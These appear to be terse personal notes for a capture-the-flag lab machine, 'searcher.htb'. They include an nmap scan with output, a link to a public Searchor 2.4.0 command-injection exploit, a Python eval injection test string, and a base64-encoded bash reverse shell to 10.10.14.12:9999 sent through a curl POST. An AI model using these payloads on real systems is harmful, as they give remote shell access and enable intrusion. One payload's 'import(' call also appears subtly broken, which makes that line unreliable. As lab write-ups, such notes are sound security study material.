ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.208 | grep '^[0-9]' | cut -d '/' -f 1 |
tr '\\n' ',' | sed s/,$//)
nmap -p$ports -sV 10.10.11.208
nmap -p$ports -sC 10.10.11.208
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-06-30 15:33 IST
Nmap scan report for 10.10.11.208
Host is up (0.31s latency).
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:28 (ECDSA)
|_ 256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: Did not follow redirect to <http://searcher.htb/>
found searcher.htb
the appache server redirects ip to name webpage on Server: Werkzeug/2.1.2 Python/3.10.6
https://github.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection/blob/main/exploit.sh
there’s vulnerability in the form
check for ssti with testing input in burp
the python server has eval function that executes commands. we need to inject :
') + str(__import__('os').system('id')) #
i mport import module dynamically at runtime and assigns to a module object.
echo -ne "bash -c 'bash -i >& /dev/tcp/10.10.14.12/9999 0>&1'" | base64 -w0
the post request should be :
',import('os').system('echo YmFzaCAgLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIvOTk5OSAwPiYxJw== |base64 -d|bash -i'))
the curl command is
curl -s -X POST http://searcher.htb/search -d "engine=Google&query=',import('os').system('echo YmFzaCAgLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIvOTk5OSAwPiYxJw== |base64 -d|bash -i'))" 1> /dev/null
or if it doesnt work directly execute the exploit. and get reverse shell as svc